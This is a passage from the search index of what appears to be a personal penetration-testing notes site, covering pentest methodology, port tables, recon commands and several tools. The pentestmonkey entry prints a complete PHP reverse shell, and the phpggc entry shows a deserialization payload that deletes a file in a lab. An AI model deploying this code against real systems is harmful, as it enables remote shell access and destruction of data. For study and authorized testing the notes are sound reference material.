                        ","tags":["privilege escalation","windows"]},{"location":"pdm/","title":"pdm - A python package and dependency manager","text":""},{"location":"pdm/#installation","title":"Installation","text":"

                        PDM, as described, is a modern Python package and dependency manager supporting the latest PEP standards. But it is more than a package manager: it boosts your development workflow in various ways. The most significant benefit is that it installs and manages packages in a similar way to npm, without needing to create a virtualenv at all.

                        curl -sSL https://raw.githubusercontent.com/pdm-project/pdm/main/install-pdm.py | python3 -\n
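Day-to-day usage after installation, as a minimal sketch:

pdm init   # create pyproject.toml interactively\npdm add requests   # add and install a dependency\npdm run python app.py   # run a script inside the managed environment\n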
                        "},{"location":"penetration-testing-process/","title":"Penetration Testing Process: A General Approach to the Profession","text":"Sources for these notes
                        • Hack The Box: Penetration Testing Learning Path
                        • INE eWPT2 Preparation course

                        Resources:

                        • https://pentestreports.com/
                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#types-of-penetration-testing","title":"Types of Penetration Testing","text":"Type Information Provided Blackbox Minimal. Only the essential information, such as IP addresses and domains, is provided. Greybox Extended. In this case, we are provided with additional information, such as specific URLs, hostnames, subnets, and similar. Whitebox Maximum. Here everything is disclosed to us. This gives us an internal view of the entire structure, which allows us to prepare an attack using internal information. We may be given detailed configurations, admin credentials, web application source code, etc. Red-Teaming May include physical testing and social engineering, among other things. Can be combined with any of the above types. Purple-Teaming It can be combined with any of the above types. However, it focuses on working closely with the defenders.","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#types-of-testing-environments","title":"Types of Testing Environments","text":"

                        Apart from the test method and the type of test, another consideration is what is to be tested, which can be summarized in the following categories:

                        Network, Web App, Mobile, API, Thick Clients, IoT, Cloud, Source Code, Physical Security, Employees, Hosts, Server, Security Policies, Firewalls, IDS/IPS.","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#phases","title":"Phases","text":"","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#pre-engagement","title":"Pre-engagement","text":"

                        The pre-engagement phase of a penetration testing is a crucial step that lays the foundation for a successful and well-planned security assessment. It involves preliminary preparations, understanding project requirements, and obtaining necessary authorizations before initiating the actual testing. During the pre-engagement phase, the penetration tester and the client must discuss and agree upon a number of legal and technical details pertinent to the execution and outcomes of the security assessment.

                        This can be one or more documents with the objective to define the following:

                        • Objectives: Clearly define the objectives and goals of the penetration test. Understand what the stakeholders aim to achieve through the testing process.
                        • Scope of the engagement: Identify the scope of the penetration test, including the specific web applications, URLs, and functionalities to be tested. Define the scope boundaries and limitations, such as which systems or networks are out-of-scope for testing.
                        • Timeline & milestones
                        • Liabilities & responsibility: Obtain proper authorization from the organization's management or application owners to conduct the penetration test. Ensure that the testing activities comply with any legal or regulatory requirements, and that all relevant permissions are secured.
                        • Rules of Engagement (RoE): Establish a set of Rules of Engagement that outline the specific rules, constraints, and guidelines for the testing process. Include details about the testing schedule, testing hours, communication channels, and escalation procedures.
                        • Communication and Coordination: Establish clear communication channels with key stakeholders, including IT personnel, development teams, and management. Coordinate with relevant personnel to ensure minimal disruption to the production environment during testing.
                        • Expectations and deliverables
                        • Statement of work
                        • The Scoping Meeting: Conduct a scoping meeting with key stakeholders to discuss the testing objectives, scope, and any specific concerns or constraints. Use this meeting to clarify expectations and ensure everyone is aligned with the testing approach.
                        • List of documents so far:
                        • Non-Disclosure Agreement (NDA): After Initial Contact
                        • Scoping Questionnaire: Before the Pre-Engagement Meeting
                        • Scoping Document: During the Pre-Engagement Meeting
                        • Penetration Testing Proposal (Contract/Scope of Work (SoW)): During the Pre-Engagement Meeting
                        • Rules of Engagement (RoE): Before the Kick-Off Meeting
                        • Contractors Agreement (Physical Assessments): Before the Kick-Off Meeting
                        • Reports: During and after the conducted Penetration Test
                        • Risk Assessment and Acceptance: Perform a risk assessment to understand the potential impact of the penetration test on the web application and the organization. Obtain management's acceptance of any risks associated with the testing process.
                        • Engagement Kick-off: Officially kick-off the penetration test, confirming the start date and timeline with the organization's stakeholders. Share the RoE and any other relevant details with the testing team.
                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#information-gathering","title":"Information gathering","text":"

                        We could tell 4 categories:

                        • Open-Source Intelligence
                        • Infrastructure Enumeration
                        • Service Enumeration
                        • Host Enumeration

                        A different way to approach to footprinting is considering the following layers:

                        1. Internet Presence: Identification of internet presence and externally accessible infrastructure. Information categories: Domains, Subdomains, vHosts, ASN, Netblocks, IP Addresses, Cloud Instances, Security Measures.
                        2. Gateway: Identify the possible security measures protecting the company's external and internal infrastructure. Information categories: Firewalls, DMZ, IPS/IDS, EDR, Proxies, NAC, Network Segmentation, VPN, Cloudflare.
                        3. Accessible Services: Identify accessible interfaces and services that are hosted externally or internally. Information categories: Service Type, Functionality, Configuration, Port, Version, Interface.
                        4. Processes: Identify the internal processes, sources, and destinations associated with the services. Information categories: PID, Processed Data, Tasks, Source, Destination.
                        5. Privileges: Identification of the internal permissions and privileges to the accessible services. Information categories: Groups, Users, Permissions, Restrictions, Environment.
                        6. OS Setup: Identification of the internal components and systems setup. Information categories: OS Type, Patch Level, Network config, OS Environment, Configuration files, sensitive private files.
                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#cloud-resources","title":"Cloud resources","text":"

                        Often cloud storage is added to the DNS list when used for administrative purposes by other employees.

                        for i in $(cat subdomainlist);do host $i | grep \"has address\" | grep example.com | cut -d\" \" -f1,4;done\n

                        More ways to find cloud storage:

                        Google dorks:

                        # Google search for AWS\nintext: example.com inurl:amazonaws.com\n\n# Google search for Azure\nintext: example.com inurl:blob.core.windows.net\n

                        Source code of the application. For instance:

                        <link rel='dns-prefetch' href=\"//example.blob.core.windows.net\">\n
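This check can be scripted: fetch the page and grep for common cloud-storage hostnames. A rough sketch that only covers AWS S3 and Azure Blob endpoints (extend the regex as needed):

curl -s https://example.com | grep -oE '[a-zA-Z0-9.-]+\.(s3\.amazonaws\.com|blob\.core\.windows\.net)' | sort -u\n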

                        The domain.glass service also provides cloud search for passive reconnaissance.

                        GrayHatWarfare is also worth noting. With this tool you can filter leaked private and public keys.

                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#vulnerability-assessment","title":"Vulnerability assessment","text":"

                        During the vulnerability assessment phase, we examine and analyze the information gathered during the information gathering phase. In Vulnerability Research, we look for known vulnerabilities, exploits, and security holes that have already been discovered and reported. After that, we should mirror the target system locally as precisely as possible to replicate our testing locally.

                        The purpose of a Vulnerability Assessment is to understand, identify, and categorize the risk for the more apparent issues present in an environment without actually exploiting them to gain further access.

                        Types of tests: black box, gray box and white box.

                        Specializations:

                        • Application pentesters.
                        • Network or infrastructure pentesters.
                        • Physical pentesters.
                        • Social engineering pentesters.

                        Types of Security assessments:

                        • Vulnerability assessment.
                        • Penetration test.
                        • Security audits.
                        • Bug bounties.
                        • Red team assessments.
                        • Purple team assessments.

                        Vulnerability Assessments and Penetration Tests are two completely different assessments. Vulnerability assessments look for vulnerabilities in networks without simulating cyber attacks. Penetration tests, depending on their type, evaluate the security of different assets and the impact of the issues present in the environment.

                        Source: HTB Academy and predatech.co.uk

                        Compliance standards

                        • Payment Card Industry Data Security Standard (PCI DSS).
                        • Health Insurance Portability and Accountability Act (HIPAA).
                        • Federal Information Security Management Act (FISMA).
                        • ISO 27001.
                        • The NIST (National Institute of Standards and Technology) is well known for their NIST Cybersecurity Framework.
                        • OWASP stands for the Open Web Application Security Project:
                          • Web Security Testing Guide (WSTG)
                          • Mobile Security Testing Guide (MSTG)
                          • Firmware Security Testing Methodology

                        Frameworks for Pentesting:

                        • Penetration Testing Execution Standard (PTES).
                        • Open Source Security Testing Methodology Manual (OSSTMM).
                        • Common Vulnerability Scoring System (CVSS).
                        • Common Vulnerabilities and Exposures (CVE).

                        Scanners: OpenVAS, Nessus, Nexpose, and Qualys.

                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#exploitation","title":"Exploitation","text":"

                        Once we have set up the system locally and installed known components to mirror the target environment as closely as possible, we can start preparing the exploit by following the steps described in the exploit. Then we test it on a locally hosted VM to ensure it works and does not cause significant damage.

                        • Transferring File Techniques: Linux.
                        • Transferring File Techniques: Windows
                        • Transferring files with code.
                        • File Encryption: windows and linux .
                        • LOLbins - \"Living off the land\" binaries: LOLbas and GTFObins.
                        • Evading detection in file transfers.
                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#post-exploitation","title":"Post-exploitation","text":"

                        The Post-Exploitation stage aims to obtain sensitive and security-relevant information from a local perspective and business-relevant information that, in most cases, requires higher privileges than a standard user. This stage includes the following components:

                        • Evasive Testing: watch out when running commands such as net user or whoami, which are often monitored by EDR systems and flagged as anomalous activity. Three methods: Evasive, Hybrid evasive, and Non-evasive.
                        • Information Gathering. The information gathering stage starts all over again from the local perspective. We also enumerate the local network and local services such as printers, database servers, virtualization services, etc.
                        • Pillaging. Pillaging is the stage where we examine the role of the host in the corporate network. We analyze the network configurations, including but not limited to: Interfaces, Routing, DNS, ARP, Services, VPN, IP Subnets, Shares, Network Traffic.
                        • Vulnerability Assessment: it is essential to distinguish between exploits that can harm the system and attacks against the services that do not cause any disruption.
                        • Privilege Escalation
                        • Persistence
                        • Data Exfiltration: During the Information Gathering and Pillaging stage, we will often be able to find, among other things, considerable personal information and customer data. Some clients will want to check whether it is possible to exfiltrate these types of data. This means we try to transfer this information from the target system to our own.
                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#lateral-movement","title":"Lateral movement","text":"

                        In this stage, we want to test how far we can move manually in the entire network and what vulnerabilities we can find from the internal perspective that might be exploited. In doing so, we will again run through several phases:

                        1. Pivoting
                        2. Evasive Testing: There are many ways to protect against lateral movement, including network (micro) segmentation, threat monitoring, IPS/IDS, EDR, etc. To bypass these efficiently, we need to understand how they work and what they respond to. Then we can adapt and apply methods and strategies that help avoid detection.
                        3. Information Gathering
                        4. Vulnerability Assessment
                        5. (Privilege) Exploitation
                        6. Post-Exploitation
                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#proof-of-concept","title":"Proof-Of-Concept","text":"

                        Proof of Concept (PoC), or Proof of Principle, is a project management term: it serves as proof that a project is feasible in principle.

                        A PoC can have many different representations. For example, documentation of the vulnerabilities found can also constitute a PoC. The more practical version of a PoC is a script or code that automatically exploits the vulnerabilities found. This demonstrates the flawless exploitation of the vulnerabilities. This variant is straightforward for an administrator or developer because they can see what steps our script takes to exploit the vulnerability.

                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#post-engagement","title":"Post-Engagement","text":"","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#cleanup","title":"Cleanup","text":"

                        Cleanup: Once testing is complete, we should perform any necessary cleanup, such as deleting tools/scripts uploaded to target systems, reverting any (minor) configuration changes we may have made, etc. We should have detailed notes of all of our activities, making any cleanup activities easy and efficient.

                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#reporting","title":"Reporting","text":"

                        Documentation and Reporting: Before completing the assessment and disconnecting from the client's internal network or sending \"stop\" notification emails to signal the end of testing, we must make sure to have adequate documentation for all findings that we plan to include in our report. This includes command output, screenshots, a listing of affected hosts, and anything else specific to the client environment or finding.

                        Typical parts of a report:

                        • Executive Summary: The report typically begins with an executive summary, which is a high-level overview of the key findings and the overall security posture of the web application. It highlights the most critical vulnerabilities, potential risks, and the impact they may have on the business. This section is designed for management and non-technical stakeholders to provide a quick understanding of the test results.
                        • Scope and Methodology: This section provides a clear description of the scope of the penetration test, including the target application, its components, and the specific testing activities performed. It also outlines the methodologies and techniques used during the assessment to ensure transparency and understanding of the testing process.
                        • Findings and Vulnerabilities: The core of the penetration test report is the detailed findings section. Each identified vulnerability is listed, along with a comprehensive description of the issue, the steps to reproduce it, and its potential impact on the application and organization. The vulnerabilities are categorized based on their severity level (e.g., critical, high, medium, low) to prioritize remediation efforts.
                        • Proof of Concept (PoC): For each identified vulnerability, the penetration tester includes a proof of concept (PoC) to demonstrate its exploitability. The PoC provides concrete evidence to support the validity of the findings and helps developers understand the exact steps required to reproduce the vulnerability.
                        • Risk Rating and Recommendations: In this section, the vulnerabilities are further analyzed to determine their risk rating and potential impact on the organization. The risk rating takes into account factors such as likelihood of exploitation, ease of exploit, potential data exposure, and business impact. Additionally, specific recommendations and best practices are provided to address and mitigate each vulnerability.
                        • Remediation Plan: The report should include a detailed remediation plan outlining the steps and actions required to fix the identified vulnerabilities. This plan helps guide the development and IT teams in prioritizing and addressing the security issues in a systematic manner.
                        • Additional Recommendations: In some cases, the report may include broader recommendations for improving the overall security posture of the web application beyond the identified vulnerabilities. These may include implementing security best practices, enhancing security controls, and conducting regular security awareness training.
                        • Appendices and Technical Details: Supporting technical details, such as HTTP requests and responses, server configurations, and logs, may be included in appendices to provide additional context and evidence for the identified vulnerabilities.

                        Resources:

                        • https://pentestreports.com/
                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#report-review-meeting","title":"Report Review Meeting","text":"

                        Report Review Meeting: Once the draft report is delivered, and the client has had a chance to distribute it internally and review it in-depth, it is customary to hold a report review meeting to walk through the assessment results.

                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#deliverable-acceptance","title":"Deliverable Acceptance","text":"

                        Deliverable Acceptance: Once the client has submitted feedback (i.e., management responses, requests for clarification/changes, additional evidence, etc.) either by email or (ideally) during a report review meeting, we can issue them a new version of the report marked FINAL.

                        Post-Remediation Testing: Most engagements include post-remediation testing as part of the project's total cost. In this phase, we will review any documentation provided by the client showing evidence of remediation or just a list of remediated findings.

                        Since a penetration test is essentially an audit, we must remain impartial third parties and not perform remediation on our findings (such as fixing code, patching systems, or making configuration changes in Active Directory). After a penetration test concludes, we will have a considerable amount of client-specific data such as scan results, log output, credentials, screenshots, and more. We should retain evidence for some time after the penetration test in case questions arise about specific findings or to assist with retesting \"closed\" findings after the client has performed remediation activities. Any data retained after the assessment should be stored in a secure location owned and controlled by the firm and encrypted at rest.

                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"pentesmonkey/","title":"Pentesmonkey php reverse shell","text":"Resources to generate reverse shells
                        • https://www.revshells.com/
                        • Netcat for windows 32/64 bit
                        • Pentesmonkey
                        • PayloadsAllTheThings

                        Additionally, have a look at \"notes on reverse shells\"

                        Download Pentesmonkey from github: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php.

                        <?php\n// php-reverse-shell - A Reverse Shell implementation in PHP\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n//\n// This tool may be used for legal purposes only.  Users take full responsibility\n// for any actions performed using this tool.  The author accepts no liability\n// for damage caused by this tool.  If these terms are not acceptable to you, then\n// do not use this tool.\n//\n// In all other respects the GPL version 2 applies:\n//\n// This program is free software; you can redistribute it and/or modify\n// it under the terms of the GNU General Public License version 2 as\n// published by the Free Software Foundation.\n//\n// This program is distributed in the hope that it will be useful,\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n// GNU General Public License for more details.\n//\n// You should have received a copy of the GNU General Public License along\n// with this program; if not, write to the Free Software Foundation, Inc.,\n// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n//\n// This tool may be used for legal purposes only.  Users take full responsibility\n// for any actions performed using this tool.  If these terms are not acceptable to\n// you, then do not use this tool.\n//\n// You are encouraged to send comments, improvements or suggestions to\n// me at pentestmonkey@pentestmonkey.net\n//\n// Description\n// -----------\n// This script will make an outbound TCP connection to a hardcoded IP and port.\n// The recipient will be given a shell running as the current user (apache normally).\n//\n// Limitations\n// -----------\n// proc_open and stream_set_blocking require PHP version 4.3+, or 5+\n// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.\n// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.\n//\n// Usage\n// -----\n// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.\n\nset_time_limit (0);\n$VERSION = \"1.0\";\n$ip = '127.0.0.1';  // CHANGE THIS\n$port = 1234;       // CHANGE THIS\n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = 'uname -a; w; id; /bin/sh -i';\n$daemon = 0;\n$debug = 0;\n\n//\n// Daemonise ourself if possible to avoid zombies later\n//\n\n// pcntl_fork is hardly ever available, but will allow us to daemonise\n// our php process and avoid zombies.  Worth a try...\nif (function_exists('pcntl_fork')) {\n    // Fork and have the parent process exit\n    $pid = pcntl_fork();\n\n    if ($pid == -1) {\n        printit(\"ERROR: Can't fork\");\n        exit(1);\n    }\n\n    if ($pid) {\n        exit(0);  // Parent exits\n    }\n\n    // Make the current process a session leader\n    // Will only succeed if we forked\n    if (posix_setsid() == -1) {\n        printit(\"Error: Can't setsid()\");\n        exit(1);\n    }\n\n    $daemon = 1;\n} else {\n    printit(\"WARNING: Failed to daemonise.  
This is quite common and not fatal.\");\n}\n\n// Change to a safe directory\nchdir(\"/\");\n\n// Remove any umask we inherited\numask(0);\n\n//\n// Do the reverse shell...\n//\n\n// Open reverse connection\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\nif (!$sock) {\n    printit(\"$errstr ($errno)\");\n    exit(1);\n}\n\n// Spawn shell process\n$descriptorspec = array(\n   0 => array(\"pipe\", \"r\"),  // stdin is a pipe that the child will read from\n   1 => array(\"pipe\", \"w\"),  // stdout is a pipe that the child will write to\n   2 => array(\"pipe\", \"w\")   // stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n    printit(\"ERROR: Can't spawn shell\");\n    exit(1);\n}\n\n// Set everything to non-blocking\n// Reason: Occsionally reads will block, even though stream_select tells us they won't\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit(\"Successfully opened reverse shell to $ip:$port\");\n\nwhile (1) {\n    // Check for end of TCP connection\n    if (feof($sock)) {\n        printit(\"ERROR: Shell connection terminated\");\n        break;\n    }\n\n    // Check for end of STDOUT\n    if (feof($pipes[1])) {\n        printit(\"ERROR: Shell process terminated\");\n        break;\n    }\n\n    // Wait until a command is end down $sock, or some\n    // command output is available on STDOUT or STDERR\n    $read_a = array($sock, $pipes[1], $pipes[2]);\n    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n    // If we can read from the TCP socket, send\n    // data to process's STDIN\n    if (in_array($sock, $read_a)) {\n        if ($debug) printit(\"SOCK READ\");\n        $input = fread($sock, $chunk_size);\n        if ($debug) printit(\"SOCK: $input\");\n        fwrite($pipes[0], $input);\n    }\n\n    // If we can read from the process's STDOUT\n    // send data down tcp connection\n    if (in_array($pipes[1], $read_a)) {\n        if ($debug) printit(\"STDOUT READ\");\n        $input = fread($pipes[1], $chunk_size);\n        if ($debug) printit(\"STDOUT: $input\");\n        fwrite($sock, $input);\n    }\n\n    // If we can read from the process's STDERR\n    // send data down tcp connection\n    if (in_array($pipes[2], $read_a)) {\n        if ($debug) printit(\"STDERR READ\");\n        $input = fread($pipes[2], $chunk_size);\n        if ($debug) printit(\"STDERR: $input\");\n        fwrite($sock, $input);\n    }\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\n// Like print, but does nothing if we've daemonised ourself\n// (I can't figure out how to redirect STDOUT like a proper daemon)\nfunction printit ($string) {\n    if (!$daemon) {\n        print \"$string\\n\";\n    }\n}\n\n?> \n
                        ","tags":["reverse shell","php"]},{"location":"pentesting-network-services/","title":"Pentesting network services","text":"

                        Port numbers range from 1 to 65,535, with the range of well-known ports 1 to 1,023 being reserved for privileged services. Port 0 is a reserved port in TCP/IP networking and is not used in TCP or UDP messages. If anything attempts to bind to port 0 (such as a service), it will bind to the next available port above port 1,024 because port 0 is treated as a \"wild card\" port.

                        See Pentesting network services.

                        To locate one easily: https://www.cheatsheet.wtf/PortNumbers/

                        All ports in raw: https://raw.githubusercontent.com/maraisr/ports-list/master/all.csv.

                        ","tags":["ports","services","network services"]},{"location":"pentesting-network-services/#tcp","title":"TCP","text":"Protocol Acronym Port Description Tools File Transfer Protocol FTP 20-21 Used to transfer files ftp, lftp , ncftp, filezilla, crossftp Secure Shell SSH 22 Secure remote login service Telnet Telnet 23 Remote login service Simple Network Management Protocol SNMP 161-162 Manage network devices Hyper Text Transfer Protocol HTTP 80 Used to transfer webpages Hyper Text Transfer Protocol Secure HTTPS 443 Used to transfer secure webpages Domain Name System DNS 53 Lookup domain names Trivial File Transfer Protocol TFTP 69 Used to transfer files Network Time Protocol NTP 123 Synchronize computer clocks Simple Mail Transfer Protocol SMTP 25 Used for email transfer Thunderbird, Claws, Geary, MailSpring, mutt, mailutils, sendEmail, swaks, sendmail. Post Office Protocol POP3 110 Used to retrieve emails Internet Message Access Protocol IMAP 143 Used to access emails Server Message Block SMB 445 Used to transfer files Samba Suite, smbclient, crackmapexec, SMBMap, smbexec.py, psexec.py, Impacket Network File System NFS 111, 2049 Used to mount remote systems Bootstrap Protocol BOOTP 67, 68 Used to bootstrap computers Kerberos Kerberos 88 Used for authentication and authorization Lightweight Directory Access Protocol LDAP 389 Used for directory services Remote Authentication Dial-In User Service RADIUS 1812, 1813 Used for authentication and authorization Dynamic Host Configuration Protocol DHCP 67, 68 Used to configure IP addresses Remote Desktop Protocol RDP 3389 Used for remote desktop access Network News Transfer Protocol NNTP 119 Used to access newsgroups Remote Procedure Call RPC 135, 137-139 Used to call remote procedures Identification Protocol Ident 113 Used to identify user processes Internet Control Message Protocol ICMP 0-255 Used to troubleshoot network issues Internet Group Management Protocol IGMP 0-255 Used for multicasting Oracle DB (Default/Alternative) Listener oracle-tns 1521/1526 The Oracle database default/alternative listener is a service that runs on the database host and receives requests from Oracle clients. Ingres Lock ingreslock 1524 Ingres database is commonly used for large commercial applications and as a backdoor that can execute commands remotely via RPC. Squid Web Proxy http-proxy 3128 Squid web proxy is a caching and forwarding HTTP web proxy used to speed up a web server by caching repeated requests. Secure Copy Protocol SCP 22 Securely copy files between systems Session Initiation Protocol SIP 5060 Used for VoIP sessions Simple Object Access Protocol SOAP 80, 443 Used for web services Secure Socket Layer SSL 443 Securely transfer files TCP Wrappers TCPW 113 Used for access control Network Time Protocol NTP 123 Synchronize computer clocks Internet Security Association and Key Management Protocol ISAKMP 500 Used for VPN connections Microsoft SQL Server ms-sql-s 1433 Used for client connections to the Microsoft SQL Server. mssql-cli, mssqlclient.py, dbeaver Kerberized Internet Negotiation of Keys KINK 892 Used for authentication and authorization Open Shortest Path First OSPF 520 Used for routing Point-to-Point Tunneling Protocol PPTP 1723 Is used to create VPNs Remote Execution REXEC 512 This protocol is used to execute commands on remote computers and send the output of commands back to the local computer. Remote Login RLOGIN 513 This protocol starts an interactive shell session on a remote computer. 
X Window System X11 6000 It is a computer software system and network protocol that provides a graphical user interface (GUI) for networked computers. Relational Database Management System DB2 50000 RDBMS is designed to store, retrieve and manage data in a structured format for enterprise applications such as financial systems, customer relationship management (CRM) systems.","tags":["ports","services","network services"]},{"location":"pentesting-network-services/#udp","title":"UDP","text":"Protocol Acronym Port Description Domain Name System DNS 53 It is a protocol to resolve domain names to IP addresses. Trivial File Transfer Protocol TFTP 69 It is used to transfer files between systems. Network Time Protocol NTP 123 It synchronizes computer clocks in a network. Simple Network Management Protocol SNMP 161 It monitors and manages network devices remotely. Routing Information Protocol RIP 520 It is used to exchange routing information between routers. Internet Key Exchange IKE 500 Internet Key Exchange Bootstrap Protocol BOOTP 68 It is used to bootstrap hosts in a network. Dynamic Host Configuration Protocol DHCP 67 It is used to assign IP addresses to devices in a network dynamically. Telnet TELNET 23 It is a text-based remote access communication protocol. MySQL MySQL 3306 It is an open-source database management system. Terminal Server TS 3389 It is a remote access protocol used for Microsoft Windows Terminal Services by default. NetBIOS Name netbios-ns 137 It is used in Windows operating systems to resolve NetBIOS names to IP addresses on a LAN. Microsoft SQL Server ms-sql-m 1434 Used for the Microsoft SQL Server Browser service. Universal Plug and Play UPnP 1900 It is a protocol for devices to discover each other on the network and communicate. PostgreSQL PGSQL 5432 It is an object-relational database management system. Virtual Network Computing VNC 5900 It is a graphical desktop sharing system. X Window System X11 6000-6063 It is a computer software system and network protocol that provides GUI on Unix-like systems. Syslog SYSLOG 514 It is a standard protocol to collect and store log messages on a computer system. Internet Relay Chat IRC 194 It is a real-time Internet text messaging (chat) or synchronous communication protocol. OpenPGP OpenPGP 11371 It is a protocol for encrypting and signing data and communications. Internet Protocol Security IPsec 500 IPsec is also a protocol that provides secure, encrypted communication. It is commonly used in VPNs to create a secure tunnel between two devices. Internet Key Exchange IKE 11371 It is a protocol for encrypting and signing data and communications. X Display Manager Control Protocol XDMCP 177 XDMCP is a network protocol that allows a user to remotely log in to a computer running the X11.","tags":["ports","services","network services"]},{"location":"pesecurity/","title":"PESecurity - A powershell script to check windows binaries compilations","text":"

                        PESecurity is a powershell script that checks if a Windows binary (EXE/DLL) has been compiled with ASLR, DEP, SafeSEH, StrongNaming, Authenticode, Control Flow Guard, and HighEntropyVA.

                        "},{"location":"pesecurity/#installation","title":"Installation","text":"

                        Download from: https://github.com/NetSPI/PESecurity.

                        "},{"location":"pesecurity/#usage","title":"Usage","text":"
                        # To execute Get-PESecurity, first import the module\nImport-Module .\\Get-PESecurity.psm1\n\n# Check a single file\nGet-PESecurity -file C:\\Windows\\System32\\kernel32.dll\n\n# Check a directory for DLLs & EXEs\nGet-PESecurity -directory C:\\Windows\\System32\\\n\n# Check a directory for DLLs & EXEs recursively\nGet-PESecurity -directory C:\\Windows\\System32\\ -recursive\n\n# Export results as a CSV\nGet-PESecurity -directory C:\\Windows\\System32\\ -recursive | Export-CSV file.csv\n\n# Show results in a table\nGet-PESecurity -directory C:\\Windows\\System32\\ -recursive | Format-Table\n\n# Show results in a table and sort by a column\nGet-PESecurity -directory C:\\Windows\\System32\\ -recursive | Format-Table | sort ASLR\n
                        "},{"location":"phpggc/","title":"Phpggc - A tool for PHP deserialization","text":"

                        PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically.

                        It can be seen as the equivalent of frohoff's ysoserial, but for PHP.

                        Currently, the tool supports gadget chains such as: CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Podio, Slim, SwiftMailer, Symfony, Wordpress, Yii and ZendFramework.

                        ","tags":["webpentesting","tools","deserialization","php"]},{"location":"phpggc/#installation","title":"Installation","text":"

                        Repository: https://github.com/ambionics/phpggc

                        Clone it:

                        git clone https://github.com/ambionics/phpggc.git\n

                        List available gadget chains:

                        cd phpggc\n\n./phpggc -l\n

                        Example from Burpsuite lab:

                        ./phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt' | base64 -w 0 > test.txt\n
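phpggc can also wrap a chain in a PHAR archive, which is handy for phar:// deserialization sinks. A sketch with flags taken from the project's documentation (verify with ./phpggc -h):

./phpggc -p phar -o payload.phar Monolog/RCE1 system 'id'\n# -p phar: embed the gadget chain in the archive's metadata\n# -o: write to a file instead of stdout\n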
                        ","tags":["webpentesting","tools","deserialization","php"]},{"location":"ping/","title":"Ping","text":"

                        ping works by sending one or more special ICMP packets (Type 8 - echo request) to a host. If the destination host replies with ICMP echo reply packets, then the host is alive.

                        ping www.example.com\nping 8.8.8.8\n

                        Ping sweeping tools automatically perform the same operation on every host in a subnet or IP range.
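A quick bash ping sweep over a /24, in the same spirit (adjust the 10.10.10 subnet to your target):

for i in $(seq 1 254); do ping -c 1 -W 1 10.10.10.$i | grep \"bytes from\" & done; wait\n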

                        ","tags":["scanning","reconnaissance"]},{"location":"postfix/","title":"postfix - A SMTP server","text":"","tags":["linux","tool","SMTP","SMTP server"]},{"location":"postfix/#local-installation","title":"Local installation","text":"
                        sudo apt update\n\nsudo apt install mailutils\n# At the end of the installation a pop up will prompt you about the general type of mail configuration. Pick \"Internet site\". If not prompted, run this to execute it:\nsudo dpkg-reconfigure postfix\n# System mail name must coincide with the  server's name you provided before.\n

                        To edit the configuration of the service:

                        sudo nano /etc/postfix/main.cf\n

                        More on https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-postfix-as-a-send-only-smtp-server-on-ubuntu-18-04-es.
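Once configured, delivery can be tested with the mail command that ships with mailutils; check /var/log/mail.log if nothing arrives (user@example.com is a placeholder recipient):

echo \"Test body\" | mail -s \"Test subject\" user@example.com\n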

                        ","tags":["linux","tool","SMTP","SMTP server"]},{"location":"powerapps-pentesting/","title":"Pentesting PowerApps","text":"

                        Sources from these notes

                        Power Apps - Complete Guide to Microsoft PowerApps

                        PowerApps falls into the category of no-code/low-code solutions. PowerApps is the Microsoft solution for developing applications (an app is built in a Power Apps environment that takes care of everything needed for your code to run everywhere).

                        PowerApps enables your application to connect to almost anything and offers a great deal of customization.

                        Power Apps developed in the Power Platform environment and published for use by internal and external users are often critical to the organization.

                        They enable key business processes, leverage and interface with highly sensitive business data, and integrate with multiple data sources and applications, consequently becoming the gateway from the cloud to the organization's most sensitive business applications.

                        ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#basics-on-powerapps","title":"Basics on PowerApps","text":"

                        Power Apps is a collection of services, apps, and connectors that work together to let you do much more than just view your data. You can act on your data and update it anywhere and from any device.

                        Power Apps Home Page: If you are building an app, you'll start with the Power Apps Home Page. You can build apps from sample apps, templates, or a blank screen.

                        Power Apps Studio: Power Apps Studio is where you can fully develop your apps to make them more effective as a business tool and to make them more attractive:

                        • Left pane - Shows a hierarchical view of all the controls on each screen or a thumbnail for each screen in your app.
